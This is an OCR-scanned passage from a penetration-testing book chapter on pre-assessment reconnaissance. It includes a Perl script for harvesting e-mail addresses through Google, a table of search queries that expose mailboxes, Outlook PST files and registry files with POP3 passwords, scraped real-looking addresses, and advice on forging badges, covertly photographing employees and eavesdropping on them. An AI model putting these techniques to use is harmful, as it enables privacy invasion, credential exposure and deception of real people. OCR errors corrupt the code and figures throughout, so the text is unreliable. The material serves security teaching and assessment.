ISP's postmaster The following message could not be delivered because the address jdoe^somecom pany. com was rejected ... com p.mall.misc - Sep 29, 1999 by ew-gCiforth@netmcr.com - View Thread (2 artlclesj Backup MX, aliases and LDAP maps question Here Is a question. According to docs If I set up secondary MX forfiom&company.com all I need to do Is add somecDmpainy.com to 'relay _domains'. Right. ... maliing-PostflK.users - Feb 8. 2004 by Yegor Gorshkov - View Thread (4 articles) Email Alert System - Database Design ... CONSTRAINT [pkAlertEmail] UNIQUE CLUSTERED ( AlertlD. Email ) ) INSERT INTO #AlertEmall [AlertID, Email) VALUES (1000 , 'joe@somecompany.com') INSERT INTO ... microsoft. publici.sqlserver.proQrammlng - Apr 15, 2003 by Steve Seach - View Thread M article) ^ Display a meru Notice that the returned results list the name of the poster at the bottom of each result listing. In some cases this information is faked, but depending on the number of results, you could end up with legitimate employee names. Remember that the Google Groups Advanced Search feature (http://groups.google.com/advanced_group_search) allows you to narrow your search by specifying several additional search parameters such as Subject, Author, Date, specific phrases, and more. www.syngress.com 1 28 Chapter 4 • Pre-Assessment Browsing Google Groups results for information can be a daunting task, especially when it comes time to dig through aU the pages to find the informa- tion you're after. Chapter 1 0 contains snippets of code that can be used to extract URLs, e-mail addresses, and more fi-om scraped Google Groups result pages. Chapter 10 also goes into more detail on how to properly search for, locate, and extract e-mail addresses using regular expressions. Automated E-Mail Trolling It would be nice to have a utiUty to help automate the process of searching for e-mail addresses. Ask and you shall receive! The Perl code that follows, written by Roelof Temmingh of SensePost (www.sensepost.com), will search through Google Groups pages and Google Web pages, hunting for e-mail addresses. To use this tool, you must first obtain a Google API key from www.google.com/apis. Download the developer's kit, copying the GoogleSearch.wsdl file into the same directory as this script. Next, download and install the Expat package from sourceforge.net/projects/expat.This installation requires a ./configure and a make as is typical with most modern UNIX-based installers. This script also uses SOAP: :Lite, which is easiest to install via CPAN. Simply run CPAN irom your favorite flavor of UNIX and issue the following commands from the CPAN shell to install SOAP::Lite and various dependencies (some of which might not be absolutely necessary on your platform) : install LWP :: User Agent install XML:: Parser install MIME :: Parser force install SOAP:: Lite Although this might seem like a lot of work for one script, most Perl-based Google programs will have the same requirements, meaning that you only need to go through this process once to allow you to run this and other Google querying Perl scripts, some of which are included in later chapters of this book. Be sure to insert your Google API key into this script before running it. Now without further ado, here's the much-anticipated script: # ! /usr/bin/perl # # Google Email miner # SensePost Research 2003 # roelof@sensepost.com WWW. syngress.com Pre-Assessment • Chapter 4 129 # # Assumes the GoogleSearch.wsdl file is in same directory # $1=1; use SOAP: :Lite; if ( $#ARGV<0 ) {die "email-mine [loops] \nfor example: email-mine sensepost.com 5\n\n";} #-=-=-=-=-=-# EDIT THIS #-=-=-=-=-==-# my $key = "--==Insert Google API Key Here==--"; my $service = SOAP :: Lite->service (' file :. /GoogleSearch .wsdl ') ; # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# my $numloops = @ARGV[1] ; if ($numloops == 0 ) { $numloops=5 ; } my $target = @ARGV[0] ; my $query = "\@$target -www. $ target " ; ## Do the Google for (my $j = 0; $j < $numloops; $j++){ print STDOUT "$j " ; my $results = $service -> doGoogleSearch ( $key, $guery, (10*$j) ,10, " true" , " " , " true" , " " , " latinl " , " latinl " ) ; $re = ( @ { $results-> {resultElements } } ) ; foreach my $results ( @ { $results-> {resultElements }}) { push ©allemails , extract_email ( $results- >{ snippet} , $ target) ; } if ($re != 10) {last; } # Remove duplicates & show results print STDOUT "\n"; @allemails=dedupe ( ©allemails ) ; www.syngress.com 130 Chapter 4 • Pre-Assessment foreach $email ( Sallemails ) { print STDOUT " $email\n" ; } ## SUBS ## sub extract_email { my ( $passed, $target) =@_; # we want multiple addresses in a single line my Sin = split (/ \s/ , $passed) ; my Scollected; foreach my $line2 (@in) { my $emaila; chomp $line2; # Remove Google's boldifications . . $line2 =~ s///g; $line2 =~ s/<\/b>//g; # You can run but you can ' t hide ; ) $line2 =~ s/ at /\@/g; $line2 =~ s/ \ [at\ ] / \@/g; $line2 s/\/\@/g; $line2 =~ s/_at_/\@/g; $line2 =~ s/dot/\./g; $line2 =~ / [\W\t] * ( [\w\ .\-] {1, 15}) \@( [\w\-] +) \ . { [\w\- ]+)\. ([\w\-]+)\. ([\w\-]+) [\W\t\.]*/; $emaila="$l\@$2.$3.$4.$5"; if ( length ( $emaila) < 5){ $line2 =~ / [\W\t] * ( [\w\ .\-] {1, 15}) \@( [\w\- ]+)\. ([\w\-]+)\. ([\w\-]+) [\W\t\.]*/; $emaila = "$1\@$2 . $3 . $4" ; } if ( length ($emaila) < 4){ WWW. syngress.com Pre-Assessment • Chapter 4 131 $line2 =~ /[\W\t]*([\w\.\-] {l,15})\@([\w\- ]+)\. ([\w\-]+) [\W\t\.]*/; $emaila = " $1\@$2 . $3 " ; } # filter out junk email addresses my ( $name , undef ) = split ( /\@/ , $emaila) ; if ( length ( $emaila) > 0 && $emaila =~ /$target$/i && length ( $name) < 15) { push ©collected, $emaila; } } return ©collected; } sub dedupe { (Skeywords) = my %hash = ( ) ; foreach (©keywords) { $_ =~ tr/ [A-Z] / [a-z] /; chomp ; if ( length ($_) >1) { $hash{$_} = $_; } } return keys %hash; This code, mentioned cursorily in the SensePost paper Putting the Tea Back into CyberTerrorism (do a Google search for Tea Cyberterrorism) , performs a Google search for a domain name prepended with an @ sign, excluding the domain's main page. This wiU effectively search for e-mail addresses, even though Google ignores the @ sign. For example, when searching for gmail.com, this script wiU search for @gmail.com —www.gmail.com. This excludes hits from the gmail site itself. Consider the output of this query, as shown in Figure 4.4. www.syngress.com 132 Chapter 4 • Pre-Assessment Figure 4.4 Trolling for E-Mail Addresses Q O 0 Google Search: "@gmail.com" -www.gnnail.com I ^ I I C ] I + I |G|^ittP7/www.google.comysearch7nLm=100&hl=en&l * Q,- "3)gmail.tom" -wv™i,gmail.com| Google Web Images Groups News Frooqie more » "@gmail.cDnn" -www.gmail.com ( Search ^ Advanced Seariii Web Results 1 - 1iH) of about 1,730,000 for "©gmaii.com" - www .amail. com . (0.43 seconds) Gmail - New From Google sponsored Link gmail.google.com Introducing a Free Webmaii Service: 1000 IVIB of Storage & Googie Search Tip: Save time by hitting the return Itey instead of ciiclting on "search" gmail swap ... the gates. Why settie for g_r_a_m_o_p_43fp@gmail.com when you couid sneak ineariy and nabgramophone@gmail.com? Everyone's taiking ... www.gmai iswap.com/ - 10k - Cached - Simiiar pages E-Mail Icon Generator ... Enter youre-maii address: @ GMail.com. ... www.nhacks.com/emaiiyindex.php - Sk - Cached - Simiiar pages GmailFomms (Powered by Invision Power Board] ... Our members have made a totai of 49,751 posts We have 8,542 registered members The newest member is aii_in_aii@gmail.com IVlost users ever online was 90 on Oct 5 ... www.gmaiiforums.com/-27k-Nov 16 . 2004 - Cached - Simiiar pages Within the first few results, you should notice a few legitimate-looking e- niail addresses, specifically gramophone@gmail.com and all_in_all@gmail.com. You could sift through these results by hand plucking out e-mail addresses, or you could simply run this Perl script, which does all the heavy lifting for you. We'U run the Perl script, instructing it to search for gmail.com addresses, only using 1 of our 1000 daily allotted API queries (which translates to a total of 10 Google results). The output of this run is shown in Figure 4.5. Figure 4.5 Trolling for E-Mail Addresses, Simplified mee Terminal — bash — e3x9 jBhnny- 1 ongs-Computer : 0 usernameOgmai I .com gramophoneOgmai I .com bush04Ogmai L .com lostmonOgmai I .com kerry04@gmcii I .com □ L l_in_al lOgmai I .com jQhnny- I ongs-Computer : -/Documerits/workberich/Cod i ng $ ./emai l-mine.pl gmaiL.com 1 1 -/Documents/workbench/Cod i ng $1 A T WWW. syngress.com Pre-Assessment • Chapter 4 133 Notice that this script also located the e-mail addresses we found when we performed the search manually. This script reaUy begins to shine when we allow it to sift through more results. Allowing the script to process through 50 results (run with ./ email-maine.pl gmail.com 5) returns many more e-mail addresses, as shown below: movabletype@gmail.com fakubabe@gmail.com lostmon@gmail.com label@gmail.com charlescapps@gmail.com billgates@gmail.com ymtang@gmail.com tonyedgecombe@gmail.com ryawiUifor@gmail. com jruderman@gmail.com itchy@gmail.com gramophone@gmail.com poojara@gmail.com london20 1 2@gmail. com bush04@gmail.com fengfs@gmail. com username@gmail.com madrid2012@gmail.com somelabel@gmail. com bartjcannon@gmail.com fillmybox@gmail. com silverwolfwsc@gmail. com aU_in_aU@gmail. com mentzer@gmail.com www. syngress.com 134 Chapter 4 • Pre-Assessment kerry04@gniail.com presidentbush@gmail.com prabhav78@gmail.com Obviously, the vast majority of these e-mail addresses are invalid, but this script really shines when it's fed more specific domain names instead of free Web-based domain names. Underground Googling... Patience Pays Off Searching through thousands of Usenet posts is a tedious and time-con- suming process; however, you will find the results well worth the effort. In addition to current employees, you will likely find the names of former employees, who make for great social engineering targets. Addresses, Addresses, and More Addresses! E-mail addresses can show up in so many places that it's nearly impossible to Hst them all. However, let's take a look at some great examples. Both Outlook Express and Eudora, two popular e-mail clients, use the .mbx extension for storage of e-mail. A Google search such as finds thousands of e-mails or mailboxes sitting on the Internet, as shown in Figure 4.6. www. syngress.com Pre-Assessment • Chapter 4 135 Figure 4.6 E-Mails on the Internet? Caogle Search: filetypeimbx mbx intextiSubJect C I [G]littp://www.goo9le.com/searcli?q=filetvpe " Or JilGCype:ml3x mbx intexciSubjecc GoDgle Web Images Groups News Froogle more » www.filelype_CDm mbx Web Results 1 - 10 of about 6,590 forfiletype:mbx mbx intext:Subject_ (0.2G seconds) From MAILER-DAEMON Sat Nov 16 16:35:30 2002 Date: 16 Nov 2002 16 ... MAILER-DAEMON Sat Nov 16 16:35:30 2002 Date: 16 Nov 2002 16:35:30 +0000 From: Mail System Intemal Data '^MAILER-DAEMON@locaihost.localdomaini' Subject: DONT ... searcli .org/src/HDiAS/ MiME-ExDiode-O.IB/testmsgsyproblem.mbx - Bk - Supplemental Result - Caclieci - Similar pages From ???[@??? Sat Oct 19 22:37:13 2002 To: "manoj mallik" , '=sipping@ietf. orgs From: JIri Kuthan -^jlri.kuthan^fokus.fraunhofer.des Subject: Re: [Sipping ... WW/ orgi'ietf/calisi9naliin9i''3261/000-xx.mbx - 37k - Cach&ci - Similar pages From ???@??? Thu Apr 09 20:07:42 1998 To: "Mr. J. Max" From: "Micheal Moore" ■^mikei^geekweb.GDms Subject: Your iisting has been removed Hey Mr. J. Max, I ... www. .nl,'advies/mailing.mbx - 2k - - - £s From MAILER-DAEMON Mon Oct 5 20:03:05 1998 Date: Mon. 5 Oct 1998 ... 5 Oct 1999 20:03:05 +02O0 (MET DST) From: Mail System Intemai Data www. .rama.it> Subject: DONT ... .it'trash/ziscoyzisco.mbx - 6k - Cached - Simiiar pages Obviously, a person's private e-mails can reveal loads of information about that person, as well as the company that person works for. They also provide names of coworkers, friends, and family members as well as any mailing lists they belong to. However, more than e-mails can be found using Google. Many organizations use Microsoft Outlook for their e-mail and calendaring purposes, and it seems that Outlook has become the de facto standard in the workplace. With this in mind, the process of finding e-mails, calendars, and address books can be simpli- fied using a search such as . This search locates Outlook personal mail folders that include the words contacts, address, or inbox in the name. These words can be modified to return many other results. As shown in Figure 4.7, this query returns an ungodly number of files that were most likely never intended for public viewing. These are, after all per- sonal e-mail folders. www.syngress.com 136 Chapter 4 • Pre-Assessment Figure 4.7 Microsoft Outlook Files on the Internet O O O CoDgle Search: fitetype:pst pst ( contacts | address E inbox) I- ] I C ] |Glhttp://www.gQQ3le.cQm/sedrch?q= " Or filetypeipst pst{ contacts | address : Google Web Images Grpups News Froogle more » filetype:pH pit [ t:ontJcl5 | addre5^ | inbox) . fSearch j Web Results 1 - 10 of about 261 for filetypeipst pst ( contacts | address | inbcx). (O.t2secoiids) www.nnath.uwalerloo.ca/-m3oliver/contacts.pst File Format: Unrecognized - View as HTML Similar pages capita.wustl.edu/CAPITA/People/RHusar/contacts.pst File Forniat: Unrecognized - View as HTML Similar pages ebr-rab.ahsc.arizona.edu/lnbox.pst Unrecoginized - View as HTML www,his.conn/~5i[ produces some rather eye-opening results. You wouldn't think that people would put such sensitive information on the Internet, but as you can see in Figure 4.8, anything is possible. Figure 4.8 Registry Files Found by Google f3 O Google Search: filetypeireg reg +intexl:"irternet account manager^ ~\ [ <^ ] 0hTtp://iiVww.goo9le.com ' Q.' filecypeireg reg +intexT:']nternei account manager" Qj Google Web Images Groups News Froogle rr filetvpe;reg reg +intext:"intefnet account mmager" Web Results 1 - ID of atKJut "^11 forfiletypeireg reg -•-intcKt:"internet account manager". (0.17 seconds] REGEDIT4fHKEY CURRENT USER\So«tware\MicrosQminternet Accoune.,. REGEDIT4. [HKEY_CURRFNT_.USER\Software\MicrQ5oftVlnlernet Account Manager] "Server ID"^dword:OOOD006l "Account Name^'^dwordiOODOOOOc "Default LDAP Account ... wmv.lisp.com.au/supporUemail news. reg - 2k - Cached - bi.i - . ... •- . REGEDIT4 [-HKEY_CURRENT_USER\ldentitie5] [-HKEY_CURRENT_USER RFGEDIT4 [-HKEV_CURRFNT_USERildentitle5] [-HKFY_CURRENT_USFR\ SoftwaneVMicrasoftVlnternet Account Manager] oe-faq_de/'files/oeprerestore_reg -Ik- Cached - Similar pages REGEDIT4 [HKEY_CURRENT_USER\SQftw3re\Microsofl\lnternet Account.. REGEDIT4 [HKEY. CURREMT^USER\Software\MicrosoftVlnternet Account Manager\Accounts\ niccom] "□CEmaH"=dwDrd:[)00DD[)02"POP3 Server"="mail.ptcl.com_pk" "POPS Port ... www.ptcl.com.pky email ptcl.reg - 3k - Cached - Similar pages REGEDIT4 [HKEY_CURRENT_USER\Saftware\Micrasoft\rnternet Account REGEDIT4 [HKEY CURRENT USER\Software\Microsoft\lnlernet Account Manager] "Default Mall Account"="bookings@abblngtonhotel. co.uk" [HKEY. CURRENT USER'.Software ... Wftrw.abbin9t0nhotel.co.uk/EmallSstupF0rH0telOnly.reg - 1 1k - ."^-iC: - . . J- - ■.->:.^i Co to 'litl()://www.goin-gle.c(]m/5earch?lTl=en&lr=Sq=related:«i www.syngress.com Pre-Assessment • Chapter 4 137 The list of potential e-mail address locations could go on and on, but since we're not in the business of reckless tree killing, we 'U just round out this section with a few examples from the Google Hacking Database. Table 4.1 presents sev- eral queries that can be used to dig up e-mail addresses, sometimes in the strangest of places! Table 4.1 E-Mail Address Queries Query Description "Internal Server Error" "server at' intitle: "Execution of this script not permitted" e-mail address filetypeicsv csv intitle: index. of dead. letter inurl: fcgi-bin/echo filetypeipst pst -from -to -date intitle: index. of inbox intitle: "Index Of" -inurhmaillog maillog size inurhemail filetype:mdb filetype:xls inurl: "email.xls" filetype:xls username password email intitle: index. of inbox dbx Apache server error could reveal admin e- mail address Cgiwrap script can reveal lots of information, including e-mail addresses and even phone numbers CSV files that could contain e-mail addresses dead. letter UNIX file contains the con- tents of unfinished e-mails that can con- tain sensitive information fastcgi echo script can reveal lots of infor- mation, including e-mail addresses and server information Finds Qutlook PST files, which can con- tain e-mails, calendaring, and address information Generic "inbox" search can locate e-mail caches Maillog files can reveal usernames, e-mail addresses, user login/logout times, IP addresses, directories on the server, and more Microsoft Access databases that could contain e-mail information Microsoft Excel spreadsheets containing e-mail addresses Microsoft Excel spreadsheets containing the words username, password, and email Qutlook Express cleanup.log file can con- tain locations of e-mail information Continued www.syngress.com 138 Chapter 4 • Pre-Assessment Table 4.1 E-Mail Address Queries Query Description filetype:eml emi +intext: "Subject" +intext:"From" intitleiindex.of inbox dbx filetype:wab wab filetype:pst inurl: "outlook. pst" filetype:mbx mbx intext: Subject inurl :cgi-bin/printenv inurl: forward filetype -.forward -cvs ( filetypeimail \ filetypeiemi \ filetypeimbox \ filetypeimbx ) intext: password \ subject "Most Submitted Forms and Scripts" "this section" filetype: reg reg + intext: "internet account manager" "This summary was generated by wwwstat" Qutlool< express e-mail files contain e-mails with full headers Qutlook Express e-mail folder Qutlook Mail address books contain sen- sitive e-mail information Outlook PST files can contain e-mails, cal- endaring, and address information Qutlook versions 1-4 or Eudora mailbox files contain sensitive e-mail information Printenv script can reveal lots of informa- tion, including e-mail addresses and server information UNIX user e-mail forward files can list e- mail addresses Various generic e-mail files WebTrends statistics pages reveal directory information, client access statis- tics, e-mail addresses, and more Windows registry files can reveal information such as usernames, PQP3 passwords, e-mail addresses, and more Wwwstat statistics information can reveal directory info, client access statistics, e- mail addresses, and more In most cases, it's fairly rare to uncover these "gifts" of inftjrniation during an assessment, but it's often surprising what will turn up. In most cases, you'U be better off trolling for addresses using less "direct" techniques, but if you happen to get a hit on one of these queries during an assessment, the payofi" can be huge. Consider a query for filetype :eml eml +mtext:" Subject" +intext:"From", shown in Figure 4.9. This query can reveal fuU e-mail messages, including all header infor- mation. This much information can be very useful during a security audit. www. syngress.com Pre-Assessment • Chapter 4 139 Figure 4.9 Full E-Mails Are a Rare Treasure 0 O 0 Google Search: flletype:eml eml +intext:"Subject'' +intext:"Fronfi" [~^l I C I I + ] IGI http://www.gQQgle.CQm/sei " QL" filetypeiemi eml +intext:"Subject" +[nte>t(:" Gougle Web images Groups News Frooqle more » fjletype:eml eml +inte>it:"Subjecl" +inte>:t:"Frofn'' Search j ' 1 Web "From" is a v'ery common word and was not included in your searcii [details' ResuitB 1 10 of about IS.BOOfor filetypeieml eml +inteit:"Sulijei!t" +intext:"Fronn". (0.20 seconds) X-Messaqe-lnfo: 6sSXYD95QpWJAUURJ/7Lcu8rroYb+Wnq Received: from ... ... reply-to:OKADIGBO OLISA^oltadigbojrghotmail.coms MeBsage-ID:10S9077358t)eng@tatanova. com □ate;Tue. 6 Jui 2(KM 06:69:18 *-0B30 Subject: FROM OKADIGBO FAHfllLY Return ... travis. com.'4ia'FROM%20OKADiGBO%20FAMiLY.eml - 3I< - Caciied - Similar caaes X-Messaqe-lnfo: 9P4r4dq6Pdtaz7oXSKY8Q7XiC5K38DWW Received: from .. ... 3217.B1 .199.6.1 7.1 03576224a.Bunumaii@':a href=="http:Wwww.Bunumaii.Bn">v™w.Bunumaii. sn Received: from localhost ... ... Boundary-00=_OILNG6G0000000000000" X-Mailer; IncredlMaii (30014B7) From: "KING_TZB" ook.^clirisbianchi.^hi.eml - 26K - C i =, - . iihiI.m ]:^isi Received: from sifritpin-101-7.brvant.webtv.net (209.240.198.41) by ■■■ ... From Boogie Subject: I want this back . you1l understand why PLEASE READ TO THE END — Youll understand *Near to the door* * he paused to stand' 'as he took ... wm^ or.us/newporths.'staff.' hannabr.''FW_lwantthlsbackyou_llseewhy%5B1%5D..eml - 52k - r.arhori - aimilar panoe I Nonobvious E-Mail Relationships It's one thing to search for e-mail addresses based on a company's common domain name. It's quite another to determine e-mail addresses that are subtly connected to a target. Google can be used to determine these often critical rela- tionships that frequently reveal personal addresses and relationships between addresses and individuals. First, start with a "dirty" list of e-mail addresses grabbed with the basic e-mail location techniques discussed here. This dirty list can consist of every e-mail address found on the same page as an "obvious" e-mail address belonging to your target. For scraped newsgroup messages, this will often include quite a few "fringe" addresses. Using the dirty list, automate queries for each and every com- bination of e-mails in the list. For each combination of e-mails that results in more than one hit, there is some relationship between the addresses. The higher the number of hits for the combination, the stronger the relationship. To determine less obvious relationships, split address hits into collections. For example, scrape e-mail addresses from every Web page that lists EmailA.We'R call this list CollectionA. Next, scrape e-mail addresses from every Web page that lists EmailB. We'U call this ColkctionB. Automate Google queries that combine EinailA www.syngress.com 140 Chapter 4 • Pre-Assessment with each and every e-mail address in CollectionB. If there's a hit (any query that results in at least one hit), there's a loose relationship between EmailA and EmailB. Next, reverse the search, combining EmailB with each and every address in CollectionA. Again, a hit indicates a loose relationship between EmailB and EmailA. The researchers at SensePost (www.sensepost.com) have coded a proto- type of this technique, and the resultant list of associations can be very revealing. When tested, nonobvious relationships are often revealed in relatively short order. Personal Web Pages and Blogs In addition to the business side of the Internet, there is a more human side — one that is frequently driven by a person's vanity and sense of self-importance. One of the factors fueling the massive growth and popularity of the Internet is personal Web sites and blogs, or Web logs — personal journals of the Internet-connected masses. Blogging has recently experienced a huge boom in users all rushing to put up their personal thoughts and opinions on various matters. Often, locating an individual's personal Web page or blog can provide insight into that person, which might help you gain access to him or her as an employee via a bit of cre- ative social engineering. Searching for a person's name and e-mail address com- bined with terms such as homepage, blog, or family can quickly and easily locate these types of pages for you. From personal likes and dislikes to home phone numbers and pets' names, people slap this potentially devastating information up on the Internet without giving it a second thought. Instant Messaging In addition to using e-mail, thousands of people use one of the instant-messaging programs to stay in touch with their friends and associates. These programs use buddy lists, usually a list of an individual's "inner circle," so getting hold of a person's buddy list can be very useful at later stages of the game. So how do you find a person's buddy list? Once again, Google comes to the rescue with a simple search such as , as shown in Figure 4.10. www. syngress.com Pre-Assessment • Chapter 4 141 Figure 4.10 Buddy Lists Online O O O Google Search: inurhbuddylist.bit [ ^ .- ] I C ] |C] http://www.google.ci " inurrbuddylist.bit Web Images Groups News Froogle more » rhbuddylist.bJt {search ^ Web Results 1 -Tof 7forinurl:buddyli5Lblt (0.14 seconds) Tip: Try Google Answers for help from expert researchers Config {version 1 } User(5creenName TheGlove1990 } Buddy { list >>> Config{ version 1 } User {screenNameTheGlovel 990} Buddy { list{ CSL2 { TheGlove1990 { BuddyNote { NoteString Commish } } travmerlo WangTeeth { BuddyNote ... WAW. an gelfi re. comyin4ycourtsidei' buddy list, bit - 2k - Oic , - .■ -.-.^ Config {version 1 }User(screenName WickJuGGIo profile ». Config { version 1 } User { screenName WickJuGGIo profile { mimeType "text/aolrtf; Gharset=\"us-asciiV"' dataLength 127 dataBlob PEhUTUw ... w^.angelfire.com/bug^kvtobola/buddylist.blt - 6k - Supplemental Result - Cached - Similar pages Config f versfon 1 } User (screenName "zeraDD" profile ... Config { version 1 } User { screenName "zer aDD" profile { mimeType "texUaolrtf; charset=\"us-ascii\"" dataLength 487 dataBlob PEhUTUw ... clandl.comy; or even wiU return far too many false positives. However, let's take a look at a more creative search that narrows down the results: <"phone * * * " "address * " "e-mail" intitle: "curriculum vitae">. As you can see in Figure 4.11, creative searches yield successful results. Figure 4.11 Finding Resumes 0 O 9 Google Searcli: "phone * * *" 'address *" "e-mair intitle:"curriculLm vitae' ^ ^ ] I C I ["+~] |C|hittp://www.goo3le,ccr " A' "phone * 'address *" "e-mail" intitle:" i:urrii:ulum vitae' Google Web Images Groups News Frooqie more » pilone *** address* e-mail intitle: curncLlum v r _5earcri J pjefe,ejices Wfib Resuits 1 - 10 of about 13,100 for "phone * * *" "address *" "e-mail" lntitle:"currlculum vitae" (0.12 seconds) ffon l Curriculum Vitae ^HlJli ^lililii ss: Plione and e-mail: 181Q ... Fiie Format. PDF/Adolje Acrobat - View as j-TTML Curriculum Vitae Vibn2120QA 1 Curriculum Vitae Address: Phsne and e-mail: Avenue (347^ Evanston, IL 60208 c ... www.cas. eduysocioiogy.'facuity/ ai.pdf - Simiiar oaoes PDFiSM NACH CURRICULUM VITAE OFFICE ADDRESS. TELEPHONE & E-MAIL ... Fiie Fcmiat. PDFj'Adobe Acrobat - View as HTML ... CURRICULUM VITAE OFFiCE ADDRESS TELEPHONE & E-MAIL: University of Dept. of Economics 59tii Street Clnicago IL 60B37 Phone: (773) - » Fax ... tome. edu/^ henn/cv_ iacli.pdf - Similar pages Keeping in mind that an attacker can never have too much information when embarking on a social engineering quest, these are but a few of the ways to gather data about company employees. eBay, Amazon, and other online stores or message boards are all good places to grab information about a person's inter- ests. Amazon "wish lists" are great ways to learn about a target's interests, although we certainly don't condone "buying off" employees during an assess- ment. That's just bad form. If you even thought about doing that, refer to Appendix A to help get your feet back on a solid pen-test professional's ground. www. syngress.com Pre-Assessment • Chapter 4 143 Romantic Candlelit Dinners Gathering information about a company's employees is a vital part of preparing for a successful social engineering job. However, unless you intend to carry out your entire scam over the phone, you're going to need more than just informa- tion on paper. Phone scams work great, but to really test your company's secu- rity, you need to actually get through the front door. Breaking into a facility is part of what's been referred to as a physical assessment. A physical assessment requires a distinct set of skills and is often not performed adequately by most technical types, but in more and more cases, pen testers are being called on to give the "doorknob a turn" in the world of physical security. If you are called on to perform a basic physical assessment, Google can help in quite a few ways. Most of these assessments involve getting up close and personal with employees of the target company. Badges? We Don't Need No Steenkin' Badges! Google's image search can be used to troU for corporate logos that can be used to create everything from corporate letterhead to access badges. Creating a bogus (but realistic-looking) access badge often requires a glimpse of a real badge, which is certainly never found online. Getting a glimpse of a real badge is as simple as locating a few good employee hangouts and hanging out there yourself, but when it comes time to create an access badge, Google's image search is a terrific way to find a nice, clean logo to use for your artistic endeavors. A word of cau- tion: Once you sweet-talk your way into a facility, never, ever make the mistake of getting caught by security on your way out of the facility, even if you get a really strong hankerin' to visit the hot dog guy out fr^ont.Your coworkers wiU never let you live it down, and your story will inevitably end up in a really public place — a Google hacking book, for example. What's Nearby? Nonconfrontational contact with your target employees is an essential part of your preparation. By nonconfrontational, we mean people watching, eavesdrop- ping on conversations, and possibly even striking up fi'iendly but underhanded conversations. Once again, Google comes to the rescue with Google Local (http://local.google.com/). Google Local allows you to search by business type and location, allowing you to locate any type of business near your target, as shown in Figure 4.12. www. syngress.com 144 Chapter 4 • Pre-Assessment Figure 4.12 Google Local © O 9 Google Local I ■< - I fe^ |Glhttp://local.90(igle.ciiin/ - Q.- Coctjli Google Local BETA What Where ^^^^^ ^^^^^^^^^ I (Google Search ^ 9.g. coff99 shops e.g. Poughkeepsie, NY Remember this location Find local businesses and services on the web. Google Home - Local Search Help By simply entering a ZIP code and some key phrases, you can use Google Local to locate places to hang out to soak up corporate gossip. Let's take a look at a few examples. Coffee Shops Coffee shops are a great place to start the day, no matter where you work (unless you work for a coffee shop, of course) . Employees frequently gather at their local coffee shop to get their morning dose of caffeine before beginning their long, drudging day at the office. Hitting Google Local and searching for coffee shop within the target area will tell you the closest (and most likely) places for these not-yet-awake workers to be gathering. Grab your laptop and a large coffee and take a spot at the table closest to the line (usually the last table people want). If you haven't spent much time in these kinds of places, you probably don't realize how much gossip people engage in while in line. This could be company-related gossip or gossip about other employees — but whichever type it is, it is informa- tion that often can't be gathered anywhere else and is as good as gold. Diners and Delis So you've finished your morning eavesdropping and gotten loads of good infor- mation. That still isn't going to get you in the door. For that you need to look official. Again, Google Local can help out. Search for diners or delicatessens near www. syngress.com Pre-Assessment • Chapter 4 145 your target. What is so great about these places? Often the busy employee wiU rush out for a quick meal to take back to the office. These employees rarely remove their access badges for such a quick jaunt, and a digital camera with a zoom lens can help when it's time to create your own badge. Grab a comfortable seat with a good view of people's fronts as they herd through the chow line. Digital cameras may be obvious for this type of work, but laptops with built-in cams (such as the Sony VAIO) can be positioned to look perfectly natural as they record those juicy shots of employee badges. Gas Stations Gas stations are perfect spots to troU for badge sightings. The quick in-and-out nature makes for a constant wave of employees, especially during rush hours and lunch breaks. In most cases you won't be able to set up shop inside the station without drawing undue attention, but you can almost certainly hole up in your car for a while or hang out across the street. This is the perfect excuse to buy that super-spy lens you always wanted for your camera. Bars and Nightclubs So you were browsing John Q. Employee's blog and you noticed he's a big pool player. Using Google Local to help you pinpoint his probable favorite hangouts near work or home is quick and easy. Knowing what you know about John, you can use that information to "buddy up" to him while extracting gossip about his company and its employees. Alcohol makes for loose lips and a lowered defense, and getting John to trust you will give you yet another "in" if he sees you wan- dering the halls at his workplace. Underground Googling... Use Your Imagination! Google Local provides you with an almost infinite supply of places to bump into your target employees. The examples provided here were just a few ideas to get your creative juices flowing — but don't stop at these. Gas stations, hair salons, and grocery stores are other places where you can catch a glimpse of a badge or chat up your target. www. syngress.com 146 Chapter 4 • Pre-Assessment Pre-assessment Checklist ■ Make sure your intranet is just that — an intranet. Communications meant for internal use only should never be available on the Internet. ■ Keep up with what is being said, both good and bad, about your com- pany on the Internet. To be forewarned is to be forearmed. ■ Keep on top of what is being posted to Usenets.You can't control what your employees do on their off time, but you have every right to keep them from posting while they're at work or disclosing potentially devas- tating information about your company or network. ■ Educate your users on proper use of e-mail and instant-messaging pro- grams. Frequently browse the Internet to make sure that they haven't accidentally (or on purpose, perhaps for easier retrieval) placed some- thing on the Internet that they shouldn't have. ■ Have proper procedures in place to safeguard employee ID badges or cards. Again, education is key to prevent leakage of company secrets or other information that could be useful to an attacker. ■ You can't expect to fuUy prevent a savvy attacker using human nature against your company, but you can minimize the potential damage through user training and education. www. syngress.com Pre-Assessment • Chapter 4 Summary The phrase "You never get a second chance to make a first impression" is critical to remember when preparing for a date; it also rings true during a physical assessment or social engineering exercise. Proper preparation can make or break the success of your test and, unlike the actual testing itself, could take weeks to do properly. Learning the ins and outs of the company, learning about the people, and getting to know the environment are all crucial to your success. The bad guys know this and wiU take advantage of it. You owe it to your customers to use similar tactics in testing their defenses. Solutions Fast Track The Birds and the Bees 0 Intranet and Human Resource pages are a great way to learn details about your target. Browse the company intranet for the company's poHcies and procedures. 0 Help desk procedures and "how-to" documents contain details about an environment that might be difficult to determine using more traditional techniques. 0 Job listings reveal specific information about company structure and technologies that might be in use. 0 Scrape the Internet for company logos and images using Google Images. 0 Follow the links behind vanity photos provided on Google Images for more information about your target. Long Walks on the Beach 0 Getting more personal with the individuals who make up the target organization can bring big payofS. 0 Use Google Groups to harvest employee names. 0 Vanity is key — use Google to locate personal Web sites and blogs. 0 Use the included Perl script to harvest e-mail addresses from the target domain. 148 Chapter 4 • Pre-Assessment 0 E-mails, resumes, and instant-messaging programs can all provide intimate details about your target. Romantic Candlelit Dinners 0 Utilize Google Local to find businesses in the area for people watching and eavesdropping. 0 Stake out the area around your target and be where employees congregate. Consider restaurants, delicatessens, and gas stations for badge-sighting opportunities. 0 Go where the employees go — ^bars, pool halls, nightclubs. AH present opportunity to gain trust and gossip. Links to Sites ■ http://groups.google.com/ ■ http://images.google.com/ ■ http://www.sensepost.com/ www.syngress.com Pre-Assessment • Chapter 4 Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter 